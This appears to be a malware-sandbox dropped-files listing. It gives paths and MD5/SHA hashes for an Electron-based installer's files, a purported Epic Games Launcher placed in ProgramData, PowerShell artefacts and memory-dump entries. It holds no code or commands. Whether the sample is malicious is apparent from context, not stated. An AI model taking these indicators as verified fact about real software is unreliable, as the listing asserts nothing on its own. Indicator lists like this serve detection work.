
C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\sw.pak

MD5 67a443a5c2eaad32625edb5f8deb7852
SHA1 a6137841e8e7736c5ede1d0dc0ce3a44dc41013f
SHA256 41dfb772ae4c6f9e879bf7b4fa776b2877a2f8740fa747031b3d6f57f34d81dd
SHA512 e0fdff1c3c834d8af8634f43c2f16ba5b883a8d88dfd322593a13830047568faf9f41d0bf73cd59e2e33c38fa58998d4702d2b0c21666717a86945d18b3f29e5

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\sv.pak

MD5 272f8a8b517c7283eab83ba6993eea63
SHA1 ad4175331b948bd4f1f323a4938863472d9b700c
SHA256 d15b46bc9b5e31449b11251df19cd2ba4920c759bd6d4fa8ca93fd3361fdd968
SHA512 3a0930b7f228a779f727ebfb6ae8820ab5cc2c9e04c986bce7b0f49f9bf124f349248ecdf108edf8870f96b06d58dea93a3e0e2f2da90537632f2109e1aa65f0

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\sr.pak

MD5 c68c235d8e696c098cf66191e648196b
SHA1 5c967fbbd90403a755d6c4b2411e359884dc8317
SHA256 ab96a18177af90495e2e3c96292638a775aa75c1d210ca6a6c18fbc284cd815b
SHA512 34d14d8cb851df1ea8cd3cc7e9690eaf965d8941cfcac1c946606115ad889630156c5ff47011b27c1288f8df70e8a7dc41909a9fa98d75b691742ec1d1a5e653

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\vi.pak

MD5 db0eb3183007de5aae10f934fffacc59
SHA1 e9ea7aeffe2b3f5cf75ab78630da342c6f8b7fd9
SHA256 ddabb225b671b989789e9c2ccd1b5a8f22141a7d9364d4e6ee9b8648305e7897
SHA512 703efd12fcace8172c873006161712de1919572c58d98b11de7834c5628444229f5143d231c41da5b9cf729e32de58dee3603cb3d18c6cdd94aa9aa36fbf5de0

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\ur.pak

MD5 1ca4fa13bd0089d65da7cd2376feb4c6
SHA1 b1ba777e635d78d1e98e43e82d0f7a3dd7e97f9c
SHA256 3941364d0278e2c4d686faa4a135d16a457b4bc98c5a08e62aa12f3adc09aa7f
SHA512 d0d9eb1aa029bd4c34953ee5f4b60c09cf1d4f0b21c061db4ede1b5ec65d7a07fc2f780ade5ce51f2f781d272ac32257b95eedf471f7295ba70b5ba51db6c51d

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\uk.pak

MD5 361a0e1f665b9082a457d36209b92a25
SHA1 3c89e1b70b51820bb6baa64365c64da6a9898e2f
SHA256 bd02966f6c6258b66eae7ff014710925e53fe26e8254d7db4e9147266025cc3a
SHA512 d4d25fc58053f8cce4c073846706dc1ecbc0dc19308ba35501e19676f3e7ed855d7b57ae22a5637f81cefc1aa032bf8770d0737df1924f3504813349387c08cf

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\tr.pak

MD5 5ff2e5c95067a339e3d6b8985156ec1f
SHA1 7525b25c7b07f54b63b6459a0d8c8c720bd8a398
SHA256 14a131ba318274cf10de533a19776db288f08a294cf7e564b7769fd41c7f2582
SHA512 2414386df8d7ab75dcbd6ca2b9ae62ba8e953ddb8cd8661a9f984eb5e573637740c7a79050b2b303af3d5b1d4d1bb21dc658283638718fdd04fc6e5891949d1b

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\th.pak

MD5 a32ba63feeed9b91f6d6800b51e5aeae
SHA1 2fbf6783996e8315a4fb94b7d859564350ee5918
SHA256 e32e37ca0ab30f1816fe6df37e3168e1022f1d3737c94f5472ab6600d97a45f6
SHA512 adebde0f929820d8368096a9c30961ba7b33815b0f124ca56ca05767ba6d081adf964088cb2b9fcaa07f756b946fffa701f0b64b07d457c99fd2b498cbd1e8a5

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\te.pak

MD5 a17f16d7a038b0fa3a87d7b1b8095766
SHA1 b2f845e52b32c513e6565248f91901ab6874e117
SHA256 d39716633228a5872630522306f89af8585f8092779892087c3f1230d21a489e
SHA512 371fb44b20b8aba00c4d6f17701fa4303181ad628f60c7b4218e33be7026f118f619d66d679bffcb0213c48700fafd36b2e704499a362f715f63ea9a75d719e7

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\ta.pak

MD5 18ec8ff3c0701a6a8c48f341d368bab5
SHA1 8bff8aee26b990cf739a29f83efdf883817e59d8
SHA256 052bcdb64a80e504bb6552b97881526795b64e0ab7ee5fc031f3edf87160dee9
SHA512 a0e997fc9d316277de3f4773388835c287ab1a35770c01e376fb7428ff87683a425f6a6a605d38dd7904ca39c50998cd85f855cb33ae6abad47ac85a1584fe4e

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\zh-CN.pak

MD5 82326e465e3015c64ca1db77dc6a56bc
SHA1 e8abe12a8dd2cc741b9637fa8f0e646043bbfe3d
SHA256 6655fd9dcdfaf2abf814ffb6c524d67495aed4d923a69924c65abeab30bc74fb
SHA512 4989789c0b2439666dda4c4f959dffc0ddcb77595b1f817c13a95ed97619c270151597160320b3f2327a7daffc8b521b68878f9e5e5fb3870eb0c43619060407

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\locales\zh-TW.pak

MD5 2456bf42275f15e016689da166df9008
SHA1 70f7de47e585dfea3f5597b5bba1f436510decd7
SHA256 adf8df051b55507e5a79fa47ae88c7f38707d02dfac0cc4a3a7e8e17b58c6479
SHA512 7e622afa15c70785aaf7c19604d281efe0984f621d6599058c97c19d3c0379b2ee2e03b3a7ec597040a4eee250a782d7ec55c335274dd7db7c7ca97ddcfd378a

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar

MD5 22c22642f7e52cf30e7e432c319efdb6
SHA1 7254d1b93395b3559ecdf6c9f76756390416326a
SHA256 63c66390ec9d0adbd2b65b7ad9b798eff85c41e61f79d73dc7561def3ed47826
SHA512 56ecc2c95ebd1bf2dd03609b2f9be88e3a207635ae108873000b260c2ef15d87d5b01af68f687741061f67c4224a8f73cbd3bd6e7cd97381e1d4a0080ebc91b4

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\.prettierrc

MD5 e1a520af5c26e784010480f59df5cc15
SHA1 e6a2425dc49db9cb45825eef4b8113c36088028d
SHA256 bd5cc7b1eba49f927a3bdbc18c009407ea2f5ae07bdc980c193907d7d7c7a11b
SHA512 36a9bddf14cf84ab9cecd8453eb3322e8dca6b821a4a7393b66829740034f462db9a90cfc8f99363aaad1b21b8fdf9514d69ad7dd7916e46b026fa322df7e2c1

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\index.js

MD5 e4f4ed46cbf7884a2227a07d47907ab9
SHA1 7b9e4d9904b4468c101b121cf47e4c2816ac77e5
SHA256 04a22ae517a8f93453097ed636dee04a7635f928eef73cbc003916d091d0bbce
SHA512 4ba3d99629d983c2b073a584c58ad1d54fc3d2c55eed3e704a18e5db2c8625dc3fd5ffbffe8c56fbe5b096448eddf14b808dc97be9cf73c554095c1d842398f7

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\LICENSE

MD5 3359947cbc36ff45b55bb830956f06aa
SHA1 ac30774e2db317e4a5ca1dfd150fea3c0b818a82
SHA256 c5f00acfdb0120b3fafa9869ece941c0a095253770f652927da96352b502df90
SHA512 465af14db0693bcfcf2c13fa83f7c8ed93e8595bc5b624f0aa9d3a9b41881a965b11ed5ad3ab2a1193c628d082ada1be7338911daeab732f1f1f4415a638a9d8

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\package.json

MD5 719724ee5627e1882d44f7e2d94dbc46
SHA1 7a2379ff9e5e9d2690ef09b888a0c1b5905f3254
SHA256 930aaacf5d93e64d22491731b89edd9000971824255bf0fbd8f029629bca0978
SHA512 a4c759456c3341f7fad9fca548d61f77e0b6eb03cba33e7ed2b494ec8c7736c6572d1236fd456e35451e3ba7e7ad907562a03eac2471578a9bebaa4bf56d221a

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\.github\workflows\test.yml

MD5 a8158bf94ef160e0503aafa3f76239c6
SHA1 696eb02186543346472fe81465beafc4a69300cb
SHA256 8d2c6731e3966bb9221e7b53ced1ee8fe473bc18f7d2f22da505611fccf22b92
SHA512 eeb41da5a5ddf8230e783af875a9db7be227029796b666d1e7c8e1036edf674f47f766c0b797dba0723cf0d71da47523fae338f7933a1e517500779983aa6f84

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\lib\utils.js

MD5 46b0f23f133ba1bd568e5cbdde8e7502
SHA1 fa3154cd92cb2c398e8b324e6b8a2402e46c4a32
SHA256 bd5ed859adeda193e15672e769551966b31cecaa6294fc52297533d835af3702
SHA512 198ea2cb626be8ed7ded3188489952ae6a424da8a9294a507345bc23fd14ccbd4715dc472e4febf25f2ece460492ee3d3dceef394a79e79ea8e91950016380fd

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\notifiers\notificationcenter.js

MD5 09de38e77abd206cd405aa6ea70bda26
SHA1 f91eb550baf3378e63086160100fbc82e88a6c1e
SHA256 10dc099d7164133959a61c70ed2951921ef591738c327dbd76d7338f1c9630b4
SHA512 0dff587aedc93fd315b1b6f8001ef33973cbea5b416b5103da80dbb54e8182ceffa00402b3e6affd5193ddbac3b9c3d00210b052e8f1ee0ae91bb306552c056e

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\notifiers\toaster.js

MD5 5930863c25cd9d285e91ff10cbe7a947
SHA1 4d1a2e9942335d16b8af07b26d780dd2e1dd30cb
SHA256 3dc551eb4aa9f5ef5a2d983336e8e52714b16ad044a6e29435300299058823ed
SHA512 3b60cfb76634e60ae57a147d65930ecc5826b45f82c749bbadb16183cbbcc74faf8bad46a34058e13896f49a24d50492bcb9b1fa67e0e618bfb87d9715fb5d60

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\notifiers\notifysend.js

MD5 9792dbfec85c053f46582638e9c8a966
SHA1 35ab80ae67cabc161aa3b91c2539de8c4a00035a
SHA256 29fe357ee97ad29245f55bfcfee3ce75bc86375910d9b9709105a11d28f287de
SHA512 16347295888393ab2cae5730cb5f54fa87cc19fb1f745302cb0132eee1c5326ba15d651f81980fc8568e34fe4a935e0926e31b528ed9ccfc480b2468d53564f9

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\notifiers\growl.js

MD5 b899ef0e83aee19a163ce8ee249ac392
SHA1 b729bd63844cb485a8cb183725d8c6720633c23e
SHA256 922eecd40262c26337901479de95b0960c719df76fd3b53dfa3fc3aaed95823f
SHA512 cfc0ab6a0ab5111da7759868d4478043688f6eccd261d4f5fdaa74ffb4422956fe1cfe94974fbf3b08f1405ddd505053ee4ca3102c7182ae1e4ac5006ee2f882

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\notifiers\balloon.js

MD5 22e0b5a21107a340bd37f034e88be79a
SHA1 cfa46acdefbfb08542ac890d8de2fd007e343355
SHA256 ef68f4d2e8dfcd1443843d81707a3e0e7a2e01d9573100710736eb1990306220
SHA512 0c45207ec1875459355a01a8ce163811f267a95546171f2837dfd09a9587bd2888add14c4c0f868a67a66b56e6a15fcc8bbfb713141311bb8df737c8a23a91c1

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\lib\checkGrowl.js

MD5 fa7d81bc020ec4ef6c8055083876fcd0
SHA1 d3c62e48427f39dc613bca96997d38a06c966283
SHA256 01c807bd9f273f09ffd87bab13473865bbf321071513f5c487dd1b6e7fbdaf10
SHA512 4fb0844820363199ad78f0a667e0f945114e9d65d86283fb5bb79a1b97be25dbe8ebd2ce85a9dc40545630f3146b3897433e1d23e9117027d2c74fa698df3f1a

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\terminal-notifier-LICENSE

MD5 191db4e4fb4f0164cdf521b3ba0ac98e
SHA1 355f9a67f5e1306d76b40a720522c6999ac3c466
SHA256 77a2769c8dc103f8051ccabab083c18e4cfbd26ba51589f26278c94dee997e56
SHA512 215fe158874088f703ba003f1b163da7f99a8bd7727ca0a39406e4f51553e7149630731a78ecb573c5eeb56e04af32d984f1db2b85ccd727b0a59c52ba04d7d9

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\PkgInfo

MD5 23b7d7d024abb0f558420e098800bf27
SHA1 9f9eea0cfe2d65f2c3d6b092e375b40782d08f31
SHA256 82502191c9484b04d685374f9879a0066069c49b8acae7a04b01d38d07e8eca0
SHA512 f77d501528dd0ced155c80406cfbee38d5d3649b64d2a9324f3d6cee39491eb8f54cdebae49c6e21a20d2309d8fae1b01c41631224811e73483db25a2695738c

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\Info.plist

MD5 5046a82c05834cc8c474b184c6043cd6
SHA1 2a55a72951e61cf66e46fa7f136e68e58646ac7b
SHA256 258d7eb87e20094ee0a3c9b65e33a90effdec238c5d785a088af3d2e1ead4a61
SHA512 af782e0fe4162bc6f520ed5a75fa78f6e33e4d7a9bcb914c2ae8b73ee02a1ab3c4dc432782a8603f7f111dbe3de4bfe0e14f8fb40373602cb63a44ecf3a04823

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\MacOS\terminal-notifier

MD5 ade5227f13963b5bb72b47f0ad410819
SHA1 24d1a22cbd8b026c35b29f1981f4d9fdff08af37
SHA256 2588f4ae2118396419767c388cf2b0a9a5e0cb53ce5d05a07c00f68a97a50215
SHA512 ee702782dbd44682f0c9234fbd2d256b14ee70f349186f37e025bdac20ec5b10d515e9d91e6b54a5df7ee7312f2faf4d299e1ba1e03419cfa52585f2c1195fb6

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\Resources\Terminal.icns

MD5 20c4ead98b17946b21b207c59d9a84af
SHA1 3aaf46b493350ea7061752421e21206f486837a2
SHA256 ccfc0f457dbbed2b164a9f708e1a0000fad8f896b0d5332b376e2b748f3ff525
SHA512 f0e8557e37c3aad01d80c4bbfe36eb506164cfbeb689934b300934a3ec46025559dbaa9d5d725a9b5f0b6a1d0dea2ed8f940fa041bb1756fb0dc7aea717c5435

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\Resources\en.lproj\Credits.rtf

MD5 f0d4a61caf597423ff07c5e9b24a345e
SHA1 60a248148b319de26e36424d25021c2488e23ce8
SHA256 b4386fe1cef65cd91e6c8ecc065d117089083f91b7cadbf0c3e5eae20e8b9640
SHA512 e361011499cf70fc71e247fdda71f49d913654a983aa4ae67d00dc977e53b9cf0d88d4d2ac07efe248261c3ab6e3345e829e22dda3e51dccc221a94c660ace69

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\Resources\en.lproj\InfoPlist.strings

MD5 51ef59b60e5b41b91519cc662a9fe886
SHA1 3222ca0c39eb50aaf8126baf852e55430c4718af
SHA256 39cf2ee07b7b333e7c179d0bf4d798a5b72af6a4e584f51e642703bbfa4fc828
SHA512 3952a908b72d44040f5072f6344f6327fc78981c3aa55e931acae84c0c9bcc0d148991cd564af4803765c328cbf5f7efe9eb558fc56e47e8206b7b706026f30a

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\mac.noindex\terminal-notifier.app\Contents\Resources\en.lproj\MainMenu.nib

MD5 27c712a6b920b5908ffe207ef1eb5dd9
SHA1 97af8138a9a90d74a6cea6833df3c0cee775f836
SHA256 66a2378cee667b39af5a92676f20f2db13dcf73cf2d23d2a30ef140cdb71f1ad
SHA512 50086e239d8c791f6cadd9a2451e6842646beba6c39b4b63cd9fa9a06f0319becd02791a3136efd3268053f82e9b676599a64e4d42a254ea8d63abe97e76cae9

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\notifu\LICENSE

MD5 48c1d9a871026f547e17ead59cde3e57
SHA1 d2354b8b8a09321bd6b19dde969631683cdc9c67
SHA256 70277439f914fd361541c44fec279ae8d03ad37aeac8c92f79c2914da4b5d7eb
SHA512 78024387578b9f8d73c2d89916a40ab6a0b6dd325b9cbc4ec41e429cece566bf7e01adb804d2f313c3900c5dbd2c188dd9d983ea3b8c59b8b6602ec8ecc7b43f

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\snoreToast\LICENSE

MD5 7d8cf1676495e6aada6674f45e6a64ef
SHA1 1ed1a695762806e180df6e90f6330d242233b3fb
SHA256 2f4414f727c43c1ea8778482d4a88087f871717539299116c498fa113d1fcdbc
SHA512 c8610057717aa1eacbb247cdf18a83d27e890d2f65c92597ef282b960dda9aabc64e313e1210ca53c6db9979ffdf3b9af2376c6d7b3f0b5de5414dfc4900335f

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\snoreToast\snoretoast-x86.exe

MD5 e115661373cad5064bc1cbd0ca2a4d4f
SHA1 553019c433f2d7ac45ac269574df288fe4e52d2f
SHA256 7750fab8cb0a513be8e4355f3ed1b6d8d558737504ff8d9d37a6bb941b8c2fca
SHA512 2ac8b1559a42c78f914f130a20528dd731edcb3bc074a473c6dade7c9dcfaf4b74ac0dc2625479491c6e30cf006a3f186542a27950a953868b6efa9393ec197e

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\snoreToast\snoretoast-x64.exe

MD5 6a4d73bafd9b0ca7ced640905c692df8
SHA1 02de150d50b3e085323e8571ca2c495291687ae8
SHA256 42d20792498514562cfd6fd8221b4abb59229e893073fc59fbfc83f884a2401b
SHA512 e2af448875356f268499169ff344b7049e2f4ee087a2b75c2b20bad28c806f013e7a143d8515a905b1097774f7854886c1c7b43fd08ed1f5b8142f83897422af

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\notifu\notifu64.exe

MD5 22ccbd8cb9e0aeecd800982b775f6c53
SHA1 435ef53a9ae4ca0ec440b7eaa30ca88c63944a9d
SHA256 782844f162bdd974197f2fcba5f0ddc19b68b03452724deade3b9e8581a707a2
SHA512 2152f44fa154820a5b7e4ee6035d77629a40fcd5b132c2272b3da0b2ff4e77b4384a048b4513b1cf4bdd3f6d9c3789f5bf73d04b6b2bdadad7b1ff1534cdb575

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\7z-out\resources\app.asar.unpacked\node_modules\node-notifier\vendor\notifu\notifu.exe

MD5 f9866e44cc75e918414c0022d2d70874
SHA1 50fba0d0436c8432b113d65e8ec01eb2191bee6c
SHA256 0250c64249cb099c186bca770dd90d571a9fe12f4fab986f1b3124e833adb974
SHA512 b1173f66ec24a95ee484deb7575337f542fa831e92909383463e7e6a18a85ad33492e50314ab45323951f65c23c429c10f66d5297843fef5c791384bba518e56

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

memory/5372-1225-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1232-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1233-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1237-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1241-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1240-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1238-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1239-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1243-0x00000194853D0000-0x00000194853D1000-memory.dmp

memory/5372-1242-0x00000194853D0000-0x00000194853D1000-memory.dmp

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

MD5 f455217ebfdeed38faa8b4250f226845
SHA1 1286fedd7ee487768524f0fd3d55ac2c4588f250
SHA256 8d47685cafc797fd2f303d97db5006785f35fa7af30f57ab26c432374e11eb44
SHA512 cc09067bdcbbf6c60189274891be9a878c3faab97d25eebdd244a4aeda206bb4ca7eb5af7869b7b7e4d2beb6cabc61607411c34bc5396fb291ee55a4546954a2

C:\ProgramData\Epic\Launcher\ffmpeg.dll

MD5 6ab9920a0a6d9b6dc4bb8b1489ebe11f
SHA1 9e3c4f55196aaf045717a86ec17bbb5dc9b3d98e
SHA256 0af216edf1d565906d325ea0fe18e7b67b5dd85cc9cee0d166e5811eb1b9dd14
SHA512 d2f9a41b11a3d25743b61f34d3193e0d10166e34dc30ac72b651694b5f38d40b55204b98162ed38bc6445cc017e3660b2c895a1f4e760e80d47c53e2dfac54da

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

MD5 d1bdac4986d28fc0351cf49366e67c4e
SHA1 3799b077ddb05f5ad10053ab7238a469836a3442
SHA256 ab9ee3128d860ff575d861d26cb6f1504e6884abdac96b1151906aead159c133
SHA512 a36ce8947155353457772f07b1de78a9c39c722da8c06d1016ed33882b9271c7674ac4f5a4617e488f85e606a2aac38cc500fc248c3d6b4dfb5105575c3c944c

C:\ProgramData\Epic\Launcher\icudtl.dat

MD5 95589fc9e0654112b8beb564736a1ba9
SHA1 f6402f42570b02d8d12e56193035f648470db275
SHA256 85aeeafa7ed7e2f5a151e23d31d6a2b22a872dbe38cab43613370746f9921059
SHA512 6f2c4f7041ac12bcec6f4fe0cf62e4ebcea2994b3e601b7493afaf772d1592393649368ad99082be7edcf6d3513f096678e282180450fb2ddd9216eee0a206cb

C:\ProgramData\Epic\Launcher\resources\app.asar

MD5 f324dfa124326f2aaa684b0beeaeae8f
SHA1 d4173acc2a5b9aadc4d73ab0f7d236b4ac4940c1
SHA256 c42187156ab128320d8f39266cfdc50a7606ac157f764bb89a1c26786f53d4b9
SHA512 9e41928b1a1251b799d416d7353b8e2a0152e8ebccf961608ed3e4df06190d61889ac2c48ad24434c437d7ed2b46d03da3f3873454b96dc59d77269f03aa99ca

C:\Users\Admin\AppData\Local\Temp\c04e46cd-0234-4012-8884-4f1f5284d7c6.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

memory/2108-1270-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp

memory/2108-1271-0x000002A8B3D80000-0x000002A8B3D90000-memory.dmp

memory/2108-1269-0x000002A8B3FC0000-0x000002A8B3FE2000-memory.dmp

memory/2108-1272-0x000002A8B3D80000-0x000002A8B3D90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2fel5fe.rzt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2108-1273-0x000002A8B40A0000-0x000002A8B40F0000-memory.dmp

memory/2108-1277-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f48896adf9a23882050cdff97f610a7f
SHA1 4c5a610df62834d43f470cae7e851946530e3086
SHA256 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA512 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

memory/4508-1281-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp

memory/4508-1282-0x00000206A8890000-0x00000206A88A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e86a2f4d6dec82df96431112380a87e6
SHA1 2dc61fae82770528bee4fe5733a8ac3396012e79
SHA256 dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a
SHA512 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

memory/4508-1293-0x00000206A8890000-0x00000206A88A0000-memory.dmp

memory/4508-1296-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

MD5 81195811987c1a47947406c29d829355
SHA1 3ccdd4656ed53566216135bfae636f38386f0c11
SHA256 70294f536bf3ee941a74a8ac2bc629f80880d524d765168bc3c9590de9673ded
SHA512 bb0459c967b0b6e165c5c969f58f6760d0de7813ad77c155a2c47f82729406fef2bfaf48a11145ebbc857475667b8c110f7e2042eab65eebfbf727d21510b0b0

C:\ProgramData\Epic\Launcher\resources.pak

MD5 7971a016aed2fb453c87eb1b8e3f5eb2
SHA1 92b91e352be8209fadcf081134334dea147e23b8
SHA256 9cfd5d29cde3de2f042e5e1da629743a7c95c1211e1b0b001e4eebc0f0741e06
SHA512 42082ac0c033655f2edae876425a320d96cdaee6423b85449032c63fc0f7d30914aa3531e65428451c07912265b85f5fee2ed0bbdb362994d3a1fa7b14186013

C:\ProgramData\Epic\Launcher\ffmpeg.dll

MD5 bff7c4adfb6c20be0c5585bdf736b041
SHA1 7db699ce0519e8550c7a85a5670181d826e41840
SHA256 b3d0d1cf9d575174580380f754d81db54bd4c40b315706931eedb443d1e362d4
SHA512 76339172ef44f57be03ad6c2c6e53f0330f257543aa0790a9b0d275e9aea050a0d225c52ff7c81f73f680731ea88dd0212189ca008045b337c3504f8205826d9

C:\ProgramData\Epic\Launcher\libglesv2.dll

MD5 aa3f5bb5e3162a9e6e43ef5e0d2e0f26
SHA1 31aaaaa9f83694e6c2a00cb01526bc719a9ff588
SHA256 df557798c665ea50228741cd0a9b06545ed2f1b42d610df8d0d5d2f69da1403d
SHA512 7e8e3c4d0743714e66e68a1bc1bef72fd4877b73f0b13283d3e7eeccec614f9acf3d2bb6835d3a25c8aa9ce93a635532ef901defc3cfcbef4ecff7db126f3d0c

C:\ProgramData\Epic\Launcher\d3dcompiler_47.dll

MD5 ab33d3e8283ea8e825ed22541405c891
SHA1 7396bb738b202e2433c6e8dc698250fc82890d37
SHA256 3ed852f2b2681de031223c531f0d7311949b77a9cbe81c88f1a2d5496e0e4259
SHA512 a6ab0395e35d39405836bd067f4c728bc5b8b39fb5e844830e46d6b6ebf90df547150a1e715ea7385b579065562d0bfc6272c01f4cbffcd3112da55038cd1c15

C:\ProgramData\Epic\Launcher\D3DCompiler_47.dll

MD5 b30e4fdef57b03ead3a2596b3e4921e2
SHA1 d3ff423c16f67185c655bb8c416112f5dcb56fce
SHA256 f3a4c54fe64b83e4d23ceb0b06e11c982d7b0cd9cb1d6f5a4da071a04e4771d6
SHA512 20b8c363de63ac8ff4252b6fdaf6d33268226f41d6d0fd0cd3a03c5180c5beee451e8515b88a721c7b06cc216496797be2b4a9e7eebd70a59e2519b12f9a78e1

C:\ProgramData\Epic\Launcher\vk_swiftshader.dll

